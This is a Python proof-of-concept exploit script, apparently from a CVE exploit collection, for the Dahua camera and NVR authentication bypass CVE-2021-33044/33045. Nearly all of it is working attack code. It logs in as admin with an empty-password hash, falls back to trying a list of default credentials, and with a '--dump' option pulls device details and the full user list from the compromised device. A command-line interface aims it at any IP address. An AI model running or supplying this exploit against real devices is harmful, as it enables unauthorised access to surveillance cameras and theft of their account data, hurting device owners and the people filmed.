5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / dahua_auth_bypass.py PY
#!/usr/bin/env python3
"""
Dahua Authentication Bypass PoC
CVE-2021-33044 & CVE-2021-33045

Real vulnerability (Source: NVD / Dahua Security Advisory DSA-2021-001):
  "The identity authentication bypass vulnerability found in some Dahua products
   during the login process. Attackers can bypass device identity authentication
   by constructing malicious data packets."
  CVSS: 9.8 CRITICAL | CWE-287 (Improper Authentication)
  In CISA Known Exploited Vulnerabilities Catalog (added 2024-08-21)
  Ref: https://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html
       http://seclists.org/fulldisclosure/2021/Oct/13

CVE-2021-33044: Affects IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-*
                Firmware < 2.820.0000000.5.r.210705 (IPC) / 2.630.x (TPC)
CVE-2021-33045: Same IPC models PLUS NVR-1xxx/2xxx/4xxx/5xxx/6xx, XVR-4x*/5x*/7x*
                Firmware < 4.001.x

Attack method: The RPC2 login challenge-response uses:
  step1 = MD5("user:realm:PASSWORD")    <- attacker leaves PASSWORD empty
  step2 = MD5("step1:random:step1")
  Vulnerable firmware incorrectly accepts step1 computed with an empty password,
  granting full admin access without knowing the actual password.
"""

import requests
import hashlib
import json
import argparse
import sys

requests.packages.urllib3.disable_warnings()

# ---------------------------------------------------------------------------
# RPC2 helpers
# ---------------------------------------------------------------------------

def rpc2_get_challenge(target, port, timeout=8, http=None):
    """
    Step 1 of login: send empty-password probe to get server realm + random nonce.
    The camera always responds with these even before auth is verified.
    """
    url = f"http://{target}:{port}/RPC2_Login"
    payload = {
        "method": "global.login",
        "params": {
            "userName": "admin",
            "password": "",
            "clientType": "Web3.0",
            "loginType": "Direct",
            "authorityType": "Default",
            "passwordType": "Default"
        },
        "id": 1,
        "session": 0
    }
    try:
        r = (http or requests).post(url, json=payload, timeout=timeout, verify=False)
        data = r.json()
        realm  = data.get("params", {}).get("realm", "")
        random = data.get("params", {}).get("random", "")
        return realm, random, data
    except Exception as e:
        return None, None, str(e)


def rpc2_bypass_hash(username, realm, random_str):
    """
    CVE-2021-33044 / CVE-2021-33045 bypass.

    A correct client computes:
      step1 = MD5("{user}:{realm}:{PASSWORD}")
      step2 = MD5("{step1}:{random}:{step1}")

    The bypass: use an EMPTY password field in step1.
    Vulnerable Dahua firmware does not distinguish between an empty-password
    hash and a valid-credential hash, so it grants access.
    """
    step1 = hashlib.md5(f"{username}:{realm}:".encode()).hexdigest().upper()
    step2 = hashlib.md5(f"{step1}:{random_str}:{step1}".encode()).hexdigest().upper()
    return step2


def rpc2_legit_hash(username, password, realm, random_str):
    """Correct hash  used for default-cred testing on patched devices."""
    step1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest().upper()
    step2 = hashlib.md5(f"{step1}:{random_str}:{step1}".encode()).hexdigest().upper()
    return step2


def rpc2_send_login(target, port, username, pw_hash, session=0, timeout=8, http=None):
    """Step 2: submit the hash and return the JSON response."""
    url = f"http://{target}:{port}/RPC2_Login"
    payload = {
        "method": "global.login",
        "params": {
            "userName": username,
            "password": pw_hash,
            "clientType": "Web3.0",
            "loginType": "Direct",
            "authorityType": "Default",
            "passwordType": "Default"
        },
        "id": 2,
        "session": session
    }
    try:
        r = (http or requests).post(url, json=payload, timeout=timeout, verify=False)
        return r.json()
    except Exception as e:
        return {"error": str(e)}


# ---------------------------------------------------------------------------
# Core bypass
# ---------------------------------------------------------------------------

def exploit_auth_bypass(target, port=80, timeout=8):
    """
    Full CVE-2021-33044 / CVE-2021-33045 auth bypass.
    Returns (success, session_id, response).
    """
    http = requests.Session()
    http.verify = False
    print(f"[*] Probing RPC2 challenge from {target}:{port} ...")
    realm, random_str, raw1 = rpc2_get_challenge(target, port, timeout, http=http)

    if not realm:
        print(f"[-] Could not reach RPC2_Login: {raw1}")
        return False, None, raw1

    sess = raw1.get("session", 0) if isinstance(raw1, dict) else 0
    print(f"[+] Challenge  realm='{realm}'  random='{random_str}'  session={sess}")

    bypass_hash = rpc2_bypass_hash("admin", realm, random_str)
    print(f"[*] Sending bypass hash (empty-password): {bypass_hash}")

    resp = rpc2_send_login(target, port, "admin", bypass_hash, sess, timeout, http=http)

    if resp.get("result") is True:
        session_id = resp.get("session", "")
        print(f"\n[!!!] BYPASS SUCCESSFUL  (CVE-2021-33044/33045)")
        print(f"[!!!] Session ID : {session_id}")
        return True, session_id, resp
    else:
        err = resp.get("error", {})
        print(f"[-] Bypass rejected  code={err.get('code')} msg={err.get('message')}")
        print(f"    Target may be patched or RPC2 is not on this port.")
        return False, None, resp


def test_default_creds(target, port=80, timeout=8):
    """Fallback: try default passwords via the correct hash on a patched device."""
    defaults = [
        ("admin", ""),
        ("admin", "admin"),
        ("admin", "888888"),
        ("admin", "666666"),
        ("admin", "123456"),
        ("666666", "666666"),
        ("888888", "888888"),
    ]
    http = requests.Session()
    http.verify = False
    print("\n[*] Trying default credentials ...")
    realm, random_str, raw = rpc2_get_challenge(target, port, timeout, http=http)
    if not realm:
        print("[-] RPC2 unreachable  skipping")
        return None

    sess = raw.get("session", 0) if isinstance(raw, dict) else 0
    for user, pw in defaults:
        h = rpc2_legit_hash(user, pw, realm, random_str)
        resp = rpc2_send_login(target, port, user, h, sess, timeout, http=http)
        if resp.get("result") is True:
            print(f"[+] Valid credentials: {user}:{pw!r}")
            return (user, pw, resp.get("session"))

    print("[-] No default credentials matched")
    return None


# ---------------------------------------------------------------------------
# Post-exploitation
# ---------------------------------------------------------------------------

def rpc2_call(target, port, session_id, method, params=None, timeout=8):
    """Authenticated RPC2 call using a live session."""
    url = f"http://{target}:{port}/RPC2"
    try:
        r = requests.post(url, json={
            "method": method,
            "params": params or {},
            "session": session_id,
            "id": 10
        }, timeout=timeout, verify=False)
        return r.json()
    except Exception as e:
        return {"error": str(e)}


def dump_info(target, port, session_id):
    """Pull device info and user list after a successful login."""
    print("\n[*] Dumping device info ...")
    for method in [
        "magicBox.getDeviceType",
        "magicBox.getSoftwareVersion",
        "magicBox.getSystemInfo",
    ]:
        resp = rpc2_call(target, port, session_id, method)
        print(f"  {method}: {resp}")

    print("\n[*] Dumping user list ...")
    resp = rpc2_call(target, port, session_id, "userManager.getUserInfoAll")
    print(f"  Users: {json.dumps(resp, indent=2)}")


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------

def main():
    parser = argparse.ArgumentParser(
        description="Dahua Auth Bypass PoC  CVE-2021-33044 / CVE-2021-33045",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python dahua_auth_bypass.py 192.168.1.100
  python dahua_auth_bypass.py 192.168.1.100 -p 8080
  python dahua_auth_bypass.py 192.168.1.100 --dump
        """
    )
    parser.add_argument("target", help="Camera IP or hostname")
    parser.add_argument("-p", "--port", type=int, default=80, help="HTTP port (default: 80)")
    parser.add_argument("--dump", action="store_true",
                        help="After bypass, dump device info and user list")
    parser.add_argument("--timeout", type=int, default=8)
    args = parser.parse_args()

    print(f"""

  Dahua Auth Bypass PoC                           
  CVE-2021-33044 / CVE-2021-33045                 
  CVSS 9.8 CRITICAL  CWE-287                     

Target : {args.target}:{args.port}
""")

    ok, session_id, _ = exploit_auth_bypass(args.target, args.port, args.timeout)

    if not ok:
        result = test_default_creds(args.target, args.port, args.timeout)
        if result:
            ok = True
            session_id = result[2]

    if ok and session_id and args.dump:
        dump_info(args.target, args.port, session_id)

    sys.exit(0 if ok else 1)


if __name__ == "__main__":
    main()